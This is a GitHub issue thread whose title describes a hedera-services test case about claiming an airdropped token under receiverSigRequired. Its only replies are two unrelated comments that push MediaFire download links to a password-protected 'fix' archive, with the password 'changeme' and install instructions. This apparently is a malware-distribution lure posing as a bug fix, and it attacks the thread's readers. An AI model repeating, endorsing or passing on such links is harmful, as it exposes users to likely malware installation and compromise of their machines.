### ISSUE TITLE
(CLAIM_26) [Single Token] A receiver with free maxAutoAssociation slots and receiverSigRequired = true signs a tokenClaimAirdrop transaction with 1 token airdropped that is not associated to the receiver.

### ISSUE THREAD

**Issue by kimbor** [hashgraph/hedera-services#15141]

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
